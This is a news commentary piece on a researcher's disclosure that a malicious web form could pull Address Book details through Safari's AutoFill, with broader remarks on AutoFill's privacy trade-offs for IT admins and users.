A security researcher has revealed a weakness in Apple’s Safari Web browser which can be exploited by an attacker to extract sensitive personal information. The Safari vulnerability is a little more severe, but the issue illustrates the underlying privacy and security concerns with AutoFill in general.
Jeremiah Grossman, founder and CTO of WhiteHat Security, reported that it’s possible for an attacker to use a malicious Web form to cause Safari to AutoFill sensitive information like name, address, or e-mail address from the information stored in the Apple Address Book. The issue is a function of the option to fill out forms “Using info from my Address Book card,” which is checked by default in Safari.
Grossman suggests that the issue affects all browsers built on the open source WebKit engine–including Safari on both Mac OS X and iOS, as well as the Google Chrome browser. However, the proof-of-concept does not work on the most recent version of Chrome, and requires user intervention to work on iOS.
The upside is that this security flaw seems confined–more or less–to the Safari Web browser running on Mac OS X. But, since Mac OS X only makes up about five percent of the operating system market, and not all Mac OS X users rely on Safari for browsing the Web, the issue has a relatively small potential impact.
Grossman points out in his blog post on the Safari AutoFill hack, the difference between the AutoFill capabilities of other browsers or operating systems, and this particular issue is that Safari will surrender sensitive data to an attacker using a malicious Web site “even if they’ve never been there before or entered any personal information.”
The fact that the Safari hack can reveal information that was not previously typed into a given field makes it a more serious issue, but the reality is that all AutoFill features across all browsers and operating systems represent a security and privacy concern on some level. AutoFill is a feature that requires exchanging some security and privacy in favor of convenience.
AutoFill is designed to make life simpler by storing information so it can be automatically entered next time it is needed. It is most frequently encountered with form data where users fill in fields like name, address, phone number, e-mail address, etc. Once the data is stored in AutoFill, the next time a similar form field is encountered simply clicking on the field will reveal a list of the entries stored in AutoFill, or beginning to type will fill in the entry with information from AutoFill that matches what is being typed.
In a similar manner to what Grossman uses to extract information using the Safari AutoFill hack, an attacker could also extract information that a user has stored in the AutoFill feature by creating a malicious Web form with common fields and invisibly testing each letter of the alphabet to see what AutoFill entries exist.
AutoFill may also reveal sensitive information in other ways too. The AutoFill feature of the Web browser address bar may reveal URLs that have been visited, and the AutoFill feature in programs like Microsoft Excel could expose data or information that has been previously entered in other fields.
I am not suggesting that everyone abandon AutoFill and go back to tediously typing in the same information every time the need arises. I am, however, advocating that IT admins and users in general understand that the same features that provide convenience for the user also make it more convenient for an attacker to breach or compromise the data stored there.